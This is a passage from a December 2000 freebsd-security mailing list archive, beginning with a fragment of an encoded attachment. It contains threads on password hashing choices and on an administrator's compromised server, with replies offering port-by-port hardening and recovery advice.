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 pLTwkvFklF+t979Hj4fpSdKf/9k= --------------CEE33E5E78D696CB4E0EC941-- --------------070C33C436192682FC31B74B-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 7:23:34 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 07:23:30 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id 8483637B699 for ; Wed, 13 Dec 2000 07:23:30 -0800 (PST) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.1/8.11.1) with ESMTP id eBDFMF313465; Wed, 13 Dec 2000 10:22:15 -0500 (EST) (envelope-from rsimmons@wlcg.com) Date: Wed, 13 Dec 2000 10:22:15 -0500 (EST) From: Rob Simmons To: Sheldon Hearn Cc: Ralph Huntington , freebsd-security@FreeBSD.ORG Subject: Re: DES or MD5 In-Reply-To: <13649.976713889@axl.fw.uunet.co.za> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Is there a way to configure FreeBSD to use SHA1? Robert Simmons Systems Administrator http://www.wlcg.com/ On Wed, 13 Dec 2000, Sheldon Hearn wrote: > > > On Wed, 13 Dec 2000 08:23:55 EST, Ralph Huntington wrote: > > > Which is more secure, inherently, DES or MD5 for passwords? Thanks, ralph > > http://www.freebsd.org/handbook/crypt.html > > Ciao, > Sheldon. > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 7:29: 8 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 07:29:06 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from lists01.iafrica.com (lists01.iafrica.com [196.7.0.141]) by hub.freebsd.org (Postfix) with ESMTP id 16A9437B404 for ; Wed, 13 Dec 2000 07:29:04 -0800 (PST) Received: from nwl.fw.uunet.co.za ([196.31.2.162]) by lists01.iafrica.com with esmtp (Exim 3.12 #2) id 146Dob-0005Eo-00; Wed, 13 Dec 2000 17:27:33 +0200 Received: (from nobody@localhost) by nwl.fw.uunet.co.za (8.8.8/8.6.9) id RAA05475; Wed, 13 Dec 2000 17:27:32 +0200 (SAST) Received: by nwl.fw.uunet.co.za via recvmail id 5320; Wed Dec 13 17:26:30 2000 Received: from sheldonh (helo=axl.fw.uunet.co.za) by axl.fw.uunet.co.za with local-esmtp (Exim 3.16 #1) id 146Dna-0003tT-00; Wed, 13 Dec 2000 17:26:30 +0200 From: Sheldon Hearn Reply-To: freebsd-questions@freebsd.org To: Rob Simmons Cc: Ralph Huntington , freebsd-security@freebsd.org Subject: Re: DES or MD5 In-reply-to: Your message of "Wed, 13 Dec 2000 10:22:15 EST." Date: Wed, 13 Dec 2000 17:26:30 +0200 Message-ID: <14970.976721190@axl.fw.uunet.co.za> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 13 Dec 2000 10:22:15 EST, Rob Simmons wrote: > Is there a way to configure FreeBSD to use SHA1? At this time, I don't think so. The login.conf(5) manual page suggests that MD5 and DES are your only choices at this time. I should have mentioned in my original reply that this thing would be better handled on the freebsd-questions mailing list. Please follow up on that list instead of the freebsd-security list. Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 8:14:41 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 08:14:39 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from www.freebsdbox.com (unknown [216.199.94.2]) by hub.freebsd.org (Postfix) with ESMTP id 6C01F37B400 for ; Wed, 13 Dec 2000 08:14:38 -0800 (PST) Received: from localhost (robert@localhost) by www.freebsdbox.com (8.11.1/8.11.1) with ESMTP id eBDGItl00559; Wed, 13 Dec 2000 11:18:56 -0500 (EST) (envelope-from robert@cards2talk.com) Date: Wed, 13 Dec 2000 11:18:55 -0500 (EST) From: Robert McCallum X-Sender: robert@www.freebsdbox.com To: misc@openbsd.org Cc: freebsd-security@freebsd.org Subject: 911 lockdown! Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org My DNS/MAIL/WEB server was hacked recently, I don't believe they 'rooted' the server 'yet'. But I do see that they have obtained access to a user account. It apears they cracked a users account which I found out that one of my users did not adhere to our security policy and set a password that was not in accordance to our password policy. I did find the crackers address, although he did attempt to clean-up after himself, he was not very good. The machines were up aprox. 1 month and are not behind a firewall as of yet. The delay of setting up a firewall ( which there is no excuse ) is due to the fact that we are moving to a new office and leasing bandwidth from a different service provider. Who is going to assign us a new block of IP's. Laziness is the cause of this break-in. I lack the hardware to setup a firewall/router at this time. the only thing I can do is firewall the server itself. I have already wrapped and disallowed access to many services from outside our subnet, but this does not seem to be sufficient since so ports are still open and can be accessed such as, X11 on 6000, SMTP 25, IMAP on 143, etc. I also noticed that on port 587 the service named 'submission' is open ... and when I telnet to it ... It starts a sendmail shell like port 25. Is this normal? I don't remember seeing this before. In conclusion, I need to setup a firewall on that particular host ASAP. I have read a lot of documentation on firewalls and internet security which I do understand. However, I am not exp. with IP FILTER or IPFW. I have one NIC in my box with that address of (example address)208.202.32.3 and have 2 other IP's binded to the same interface. (IP Aliasing) Being that time is of the essence here, I do not have the time to readup on firewall rules right now, I would be eternally grateful for some help with the rules I need in order to filter the following ports and close all others. Port State Service 21/tcp open ftp 22/tcp open ssh 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop-3 111/tcp open sunrpc 143/tcp open imap2 587/tcp open submission 3306/tcp open mysql 6000/tcp open X11 ftp and ssh are wrapped (I know, not a good idea to wrap ssh.) In this case I had to. I am sure I can figure out how to setup IPFILTER as long as I have the correct rules. However it would be helpfule to have a very fast run down of the steps I need to take in order to get it running. thanks a lot for taking the time to read this... -robert please CC: me a copy of any replies. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 8:29:36 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 08:29:33 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from apollo.ocsny.com (apollo.ocsny.com [204.107.76.2]) by hub.freebsd.org (Postfix) with ESMTP id 2F20437B402 for ; Wed, 13 Dec 2000 08:29:33 -0800 (PST) Received: from ocsinternet.com (fw234.ocsny.com [204.107.76.234]) by apollo.ocsny.com (8.9.2/8.9.3) with ESMTP id LAA01868; Wed, 13 Dec 2000 11:29:53 -0500 (EST) Message-ID: <3A37A3AF.E2258877@ocsinternet.com> Date: Wed, 13 Dec 2000 11:28:31 -0500 From: mikel X-Mailer: Mozilla 4.73 [en] (Windows NT 5.0; I) X-Accept-Language: en MIME-Version: 1.0 To: Robert McCallum Cc: misc@openbsd.org, freebsd-security@FreeBSD.ORG Subject: Re: 911 lockdown! References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Robert, First things first do is calm down. Now do you have access to your router's config? If so set up a few access lists block everything you don't absolutely need. This is not a true fw but it will buy you some time while to regroup. If you want more direct assistance mail me directly and we'll chat... Robert McCallum wrote: > My DNS/MAIL/WEB server was hacked recently, I don't believe they 'rooted' > the server 'yet'. But I do see that they have obtained access to a user > account. It apears they cracked a users account which I found out that one > of my users did not adhere to our security policy and set a password that > was not in accordance to our password policy. > > I did find the crackers address, although he did attempt to clean-up after > himself, he was not very good. > > The machines were up aprox. 1 month and are not behind a firewall as of > yet. The delay of setting up a firewall ( which there is no excuse ) is > due to the fact that we are moving to a new office and leasing bandwidth > from a different service provider. Who is going to assign us a new block > of IP's. Laziness is the cause of this break-in. > > I lack the hardware to setup a firewall/router at this time. the only > thing I can do is firewall the server itself. I have already wrapped and > disallowed access to many services from outside our subnet, but this does > not seem to be sufficient since so ports are still open and can be > accessed such as, X11 on 6000, SMTP 25, IMAP on 143, etc. I also noticed > that on port 587 the service named 'submission' is open ... and when I > telnet to it ... It starts a sendmail shell like port 25. Is this > normal? I don't remember seeing this before. > > In conclusion, I need to setup a firewall on that particular host ASAP. I > have read a lot of documentation on firewalls and internet security which > I do understand. However, I am not exp. with IP FILTER or IPFW. > > I have one NIC in my box with that address of (example address)208.202.32.3 > and have 2 other IP's binded to the same interface. (IP Aliasing) > > Being that time is of the essence here, I do not have the time to readup > on firewall rules right now, I would be eternally grateful for some help > with the rules I need in order to filter the following ports and close all > others. > > Port State Service > 21/tcp open ftp > 22/tcp open ssh > 25/tcp open smtp > 53/tcp open domain > 80/tcp open http > 110/tcp open pop-3 > 111/tcp open sunrpc > 143/tcp open imap2 > 587/tcp open submission > 3306/tcp open mysql > 6000/tcp open X11 > > ftp and ssh are wrapped (I know, not a good idea to wrap ssh.) In this > case I had to. > > I am sure I can figure out how to setup IPFILTER as long as I have the > correct rules. However it would be helpfule to have a very fast run down > of the steps I need to take in order to get it running. > > thanks a lot for taking the time to read this... > > -robert > > please CC: me a copy of any replies. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 8:32:53 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 08:32:48 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id C72DD37B400 for ; Wed, 13 Dec 2000 08:32:47 -0800 (PST) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id RAA67233; Wed, 13 Dec 2000 17:32:35 +0100 (CET) (envelope-from des@ofug.org) Sender: des@ofug.org X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Robert McCallum Cc: misc@openbsd.org, freebsd-security@FreeBSD.ORG Subject: Re: 911 lockdown! References: From: Dag-Erling Smorgrav Date: 13 Dec 2000 17:32:35 +0100 In-Reply-To: Robert McCallum's message of "Wed, 13 Dec 2000 11:18:55 -0500 (EST)" Message-ID: Lines: 72 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Robert McCallum writes: > [...] Ideally, you should reinstall the entire system from a trusted source (preferably an original CD-ROM). That said, I'll give you a few hints about your open ports: > Port State Service > 21/tcp open ftp Only allow anonymous logins, if any (add the -A option to the ftpd line in inetd.conf) > 22/tcp open ssh Edit /etc/ssh/sshd_config to specify which hosts are allowed to connect. > 25/tcp open smtp If you don't need it, set sendmail_flags to "-q30m" so it won't listen for incoming connections but still running the queue (so you can send mail but not receive) > 53/tcp open domain Is this machine a name server? If it's not, disable named in /etc/rc.conf. If you just want a caching nameserver, edit /etc/namedb/named.conf and set listen-on to 127.0.0.1 - but if at all possible, avoid doing even that. > 80/tcp open http Is this machine a web server? > 110/tcp open pop-3 Wrap it, and make sure the pop server software is up-to-date, most pop daemons are notoriously insecure. > 111/tcp open sunrpc You don't need this. Add portmap_enable="NO" to /etc/rc.conf. > 143/tcp open imap2 Same comments as for pop3. If possible, use Cyrus, most other imap servers are notoriously insecure. > 587/tcp open submission This is probably a back door the intruder left behind. Use sockstat(1) to determine which process owns the socket, and kill it (and make sure it doesn't restart when you reboot) > 3306/tcp open mysql Does that machine really need to run mysql? If yes, does it really need to accept TCP connections? Refer to the mysql documentation for information on how to prevent it from listening for TCP connections. > 6000/tcp open X11 Why are you running X on a server? If you really must (you don't, but I won't argue the case), edit whatever script you use to start X to add the '-nolisten tcp' option to the server command line. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 8:42:56 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 08:42:52 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from sol.cc.u-szeged.hu (sol.cc.u-szeged.hu [160.114.8.24]) by hub.freebsd.org (Postfix) with ESMTP id 8965537B400 for ; Wed, 13 Dec 2000 08:42:51 -0800 (PST) Received: from petra.hos.u-szeged.hu by sol.cc.u-szeged.hu (8.9.3+Sun/SMI-SVR4) id RAA00383; Wed, 13 Dec 2000 17:42:49 +0100 (MET) Received: from sziszi by petra.hos.u-szeged.hu with local (Exim 3.12 #1 (Debian)) id 146EzR-0000MM-00 for ; Wed, 13 Dec 2000 17:42:49 +0100 Date: Wed, 13 Dec 2000 17:42:49 +0100 From: Szilveszter Adam To: freebsd-security@FreeBSD.ORG Subject: Re: 911 lockdown! Message-ID: <20001213174249.L24233@petra.hos.u-szeged.hu> Mail-Followup-To: Szilveszter Adam , freebsd-security@FreeBSD.ORG References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from des@ofug.org on Wed, Dec 13, 2000 at 05:32:35PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello! On Wed, Dec 13, 2000 at 05:32:35PM +0100, Dag-Erling Smorgrav wrote: > > 587/tcp open submission > > This is probably a back door the intruder left behind. Use sockstat(1) > to determine which process owns the socket, and kill it (and make sure > it doesn't restart when you reboot) > Uhm, if he is running sendmail (a recent version,) than it may be just that: sendmail now runs on two ports, 25 and 587 unless configured otherwise. OTB it will listen on both ports. Esp since he said that telnetting to this port starts up a sendmail which is expected behaviour. -- Regards: Szilveszter ADAM Szeged University Szeged Hungary To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 8:43:19 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 08:43:14 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id 107BC37B402 for ; Wed, 13 Dec 2000 08:43:13 -0800 (PST) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.1/8.11.1) with ESMTP id eBDGgt617561; Wed, 13 Dec 2000 11:42:55 -0500 (EST) (envelope-from rsimmons@wlcg.com) Date: Wed, 13 Dec 2000 11:42:55 -0500 (EST) From: Rob Simmons To: Robert McCallum Cc: freebsd-security@FreeBSD.ORG Subject: Re: 911 lockdown! In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I have a couple of suggestions for securing the server in the future. You should run the SSL version of pop and imap, or use stunnel to make an SSL wrapper for these services. In an optimal situation, you should only allow access to the SSL service, or at least only allow users that are behind the firewall to access the non SSL services. I would also disable ftp. You can run sftp through OpenSSH now, just look at /etc/ssh/sshd_config the last couple of lines should be uncommented out for sftp. Another option to that, if you are against running SSL version 2, is to install the package lrzsz and use that over an ssh session to transfer files. Z-modem is supported by most windows ssh clients, and in unix you just need the lrzsz on both ends of the connection. As for the MSA (Mail Submission Agent) on port 587, you can read about it in http://www.faqs.org/rfcs/rfc2476.html. It is unfortunately not implemented in many email clients at this time, and actually, if you find a good client that supports it let me know. Also, if your box has been broken into, its good policy to reinstall it from the ground up, since you never will know how deep the person got into your system, or whether the "sloppyness" is just a cover to make the admin of the machine believe that they have found all the problems. Robert Simmons Systems Administrator http://www.wlcg.com/ On Wed, 13 Dec 2000, Robert McCallum wrote: > > My DNS/MAIL/WEB server was hacked recently, I don't believe they 'rooted' > the server 'yet'. But I do see that they have obtained access to a user > account. It apears they cracked a users account which I found out that one > of my users did not adhere to our security policy and set a password that > was not in accordance to our password policy. > > I did find the crackers address, although he did attempt to clean-up after > himself, he was not very good. > > The machines were up aprox. 1 month and are not behind a firewall as of > yet. The delay of setting up a firewall ( which there is no excuse ) is > due to the fact that we are moving to a new office and leasing bandwidth > from a different service provider. Who is going to assign us a new block > of IP's. Laziness is the cause of this break-in. > > I lack the hardware to setup a firewall/router at this time. the only > thing I can do is firewall the server itself. I have already wrapped and > disallowed access to many services from outside our subnet, but this does > not seem to be sufficient since so ports are still open and can be > accessed such as, X11 on 6000, SMTP 25, IMAP on 143, etc. I also noticed > that on port 587 the service named 'submission' is open ... and when I > telnet to it ... It starts a sendmail shell like port 25. Is this > normal? I don't remember seeing this before. > > In conclusion, I need to setup a firewall on that particular host ASAP. I > have read a lot of documentation on firewalls and internet security which > I do understand. However, I am not exp. with IP FILTER or IPFW. > > I have one NIC in my box with that address of (example address)208.202.32.3 > and have 2 other IP's binded to the same interface. (IP Aliasing) > > Being that time is of the essence here, I do not have the time to readup > on firewall rules right now, I would be eternally grateful for some help > with the rules I need in order to filter the following ports and close all > others. > > Port State Service > 21/tcp open ftp > 22/tcp open ssh > 25/tcp open smtp > 53/tcp open domain > 80/tcp open http > 110/tcp open pop-3 > 111/tcp open sunrpc > 143/tcp open imap2 > 587/tcp open submission > 3306/tcp open mysql > 6000/tcp open X11 > > > ftp and ssh are wrapped (I know, not a good idea to wrap ssh.) In this > case I had to. > > I am sure I can figure out how to setup IPFILTER as long as I have the > correct rules. However it would be helpfule to have a very fast run down > of the steps I need to take in order to get it running. > > thanks a lot for taking the time to read this... > > -robert > > please CC: me a copy of any replies. > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 8:43:36 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 08:43:28 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from rly-ip01.mx.aol.com (rly-ip01.mx.aol.com [205.188.156.49]) by hub.freebsd.org (Postfix) with ESMTP id 6D4A937B400 for ; Wed, 13 Dec 2000 08:43:28 -0800 (PST) Received: from tot-tj.proxy.aol.com (tot-tj.proxy.aol.com [152.163.213.131]) by rly-ip01.mx.aol.com (8.8.8/8.8.8/AOL-5.0.0) with ESMTP id LAA24382; Wed, 13 Dec 2000 11:42:55 -0500 (EST) Received: from pavilion (AC9B9EF8.ipt.aol.com [172.155.158.248]) by tot-tj.proxy.aol.com (8.10.0/8.10.0) with SMTP id eBDGgo106776; Wed, 13 Dec 2000 11:42:50 -0500 (EST) Message-ID: <013e01c06523$bb32c020$0101a8c0@pavilion> From: "Richard Ward" To: "mikel" , "Robert McCallum" Cc: , References: <3A37A3AF.E2258877@ocsinternet.com> Subject: Re: 911 lockdown! Date: Wed, 13 Dec 2000 11:42:47 -0500 Organization: http://www.neonsky.net MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2014.211 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 X-Apparently-From: Nis8840@aol.com Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Agreed, the first step is to calm down. Although most wouldn't believe this, but system security is compromised every single day. And for every bug-fix that is released for a program, three new bugs have already surfaced. The most important thing you can do, and it will save you a great deal of time; back up frequently. Once you "know" for sure that the system is clean, and free of any trouble; back it up! This is a lesson I have learned the hard way, in the many years I've worked with Web Hosting and Shell Provider companies. The best way to keep track of bugs, is obviously via mailing lists such as this one. No system is totally secure, unless it's un-plugged. I wish you luck in getting back on your feet, and finding the kiddie(s) who have been poking around your system. -- Richard Ward, CEO richard@neonsky.net Neonsky Internet Services 877 249 6707 - US/Canada ----- Original Message ----- From: mikel To: Robert McCallum Cc: ; Sent: Wednesday, December 13, 2000 11:28 AM Subject: Re: 911 lockdown! > Robert, > > First things first do is calm down. Now do you have access to your router's > config? If so set up a few access lists block everything you don't absolutely > need. This is not a true fw but it will buy you some time while to regroup. > > If you want more direct assistance mail me directly and we'll chat... > > Robert McCallum wrote: > > > My DNS/MAIL/WEB server was hacked recently, I don't believe they 'rooted' > > the server 'yet'. But I do see that they have obtained access to a user > > account. It apears they cracked a users account which I found out that one > > of my users did not adhere to our security policy and set a password that > > was not in accordance to our password policy. > > > > I did find the crackers address, although he did attempt to clean-up after > > himself, he was not very good. > > > > The machines were up aprox. 1 month and are not behind a firewall as of > > yet. The delay of setting up a firewall ( which there is no excuse ) is > > due to the fact that we are moving to a new office and leasing bandwidth > > from a different service provider. Who is going to assign us a new block > > of IP's. Laziness is the cause of this break-in. > > > > I lack the hardware to setup a firewall/router at this time. the only > > thing I can do is firewall the server itself. I have already wrapped and > > disallowed access to many services from outside our subnet, but this does > > not seem to be sufficient since so ports are still open and can be > > accessed such as, X11 on 6000, SMTP 25, IMAP on 143, etc. I also noticed > > that on port 587 the service named 'submission' is open ... and when I > > telnet to it ... It starts a sendmail shell like port 25. Is this > > normal? I don't remember seeing this before. > > > > In conclusion, I need to setup a firewall on that particular host ASAP. I > > have read a lot of documentation on firewalls and internet security which > > I do understand. However, I am not exp. with IP FILTER or IPFW. > > > > I have one NIC in my box with that address of (example address)208.202.32.3 > > and have 2 other IP's binded to the same interface. (IP Aliasing) > > > > Being that time is of the essence here, I do not have the time to readup > > on firewall rules right now, I would be eternally grateful for some help > > with the rules I need in order to filter the following ports and close all > > others. > > > > Port State Service > > 21/tcp open ftp > > 22/tcp open ssh > > 25/tcp open smtp > > 53/tcp open domain > > 80/tcp open http > > 110/tcp open pop-3 > > 111/tcp open sunrpc > > 143/tcp open imap2 > > 587/tcp open submission > > 3306/tcp open mysql > > 6000/tcp open X11 > > > > ftp and ssh are wrapped (I know, not a good idea to wrap ssh.) In this > > case I had to. > > > > I am sure I can figure out how to setup IPFILTER as long as I have the > > correct rules. However it would be helpfule to have a very fast run down > > of the steps I need to take in order to get it running. > > > > thanks a lot for taking the time to read this... > > > > -robert > > > > please CC: me a copy of any replies. > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 9: 1:34 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 09:01:32 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id BA55237B400 for ; Wed, 13 Dec 2000 09:01:31 -0800 (PST) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.1/8.11.1) with ESMTP id eBDH15618444; Wed, 13 Dec 2000 12:01:05 -0500 (EST) (envelope-from rsimmons@wlcg.com) Date: Wed, 13 Dec 2000 12:01:05 -0500 (EST) From: Rob Simmons To: Szilveszter Adam Cc: freebsd-security@FreeBSD.ORG Subject: Re: 911 lockdown! In-Reply-To: <20001213174249.L24233@petra.hos.u-szeged.hu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org 